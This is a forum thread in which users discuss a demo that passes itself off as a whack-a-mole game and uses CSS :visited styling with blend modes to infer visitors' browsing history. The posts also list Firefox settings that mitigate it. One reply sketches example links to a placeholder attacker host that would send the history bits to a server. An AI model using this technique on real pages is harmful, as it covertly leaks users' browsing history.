Mathwiz Posted May 30, 2019 Share Posted May 30, 2019 This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night. (BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.) This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages: https://www.cnn.com https://news.ycombinator.com https://www.reddit.com https://www.amazon.com https://twitter.com/lcamtuf https://www.donaldjtrump.com https://www.farmersonly.com https://www.diapers.com ... and will tell you which ones you've visited! How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details. Note that although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently-innocuous links or buttons at the deceptive Web site) for a few minutes. Countermeasures and Mitigations There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position. Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game:" the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.) Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks! Link to comment Share on other sites More sharing options...
Mcinwwl Posted May 30, 2019 Share Posted May 30, 2019 The problem is that this demo displays data only locally, no request is sent back. And if it was, I'd assume it could have been blocked by specific rule in uBlock, as it is already nicely recognized as inline-script. Link to comment Share on other sites More sharing options...
Mathwiz Posted May 30, 2019 Author Share Posted May 30, 2019 The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back. 6 hours ago, Mathwiz said: ... although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you. IOW, the "moles" could've been 512 simple links, from ... <a href="http://mybadsite.com?user=victim1&historyBits=000" /> ... through ... <a href="http://mybadsite.com?user=victim1&historyBits=511" /> ... so when you click one, the server just collects your data and goes to the next page. And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous. Link to comment Share on other sites More sharing options...
Mcinwwl Posted May 30, 2019 Share Posted May 30, 2019 Except from specific domain and specific get request to this domain? uBo blocks nothing because why should it block tests site. Link to comment Share on other sites More sharing options...
Mathwiz Posted May 31, 2019 Author Share Posted May 31, 2019 Well, at the end of the day, all I can do is let folks know a potential security exposure exists. I can't make anyone understand it, or take it seriously.... Link to comment Share on other sites More sharing options...
Mcinwwl Posted May 31, 2019 Share Posted May 31, 2019 Sure, no harm's done The only problem I see is that in spying advertising industry changes are quick. If this technique has great potential, it would have been already used by tech companies to track users, and if this was true, tracker-blockers would have already prepared for an update After all, worth knowing, but no reason to panic. Link to comment Share on other sites More sharing options...
404notfound Posted June 4, 2019 Share Posted June 4, 2019 Haha, so my setting of keeping no history in browser is of use after all! Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now